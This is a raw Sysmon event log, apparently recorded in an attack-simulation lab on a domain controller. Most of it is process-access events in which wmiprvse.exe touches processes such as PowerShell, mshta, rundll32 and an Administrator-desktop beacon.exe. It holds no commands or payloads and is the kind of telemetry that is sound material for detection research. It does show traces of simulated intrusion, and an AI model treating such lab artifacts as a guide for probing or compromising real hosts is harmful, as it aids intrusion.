10341000x80000000000000002238950Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238949Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238948Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238947Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238946Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002238945Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:53:44.732{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756\PSHost.132591776245799885.9756.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002238944Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.732{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238943Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238942Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238941Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238940Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238939Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238938Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238937Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238936Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238935Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238934Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238933Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238932Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238931Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238930Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT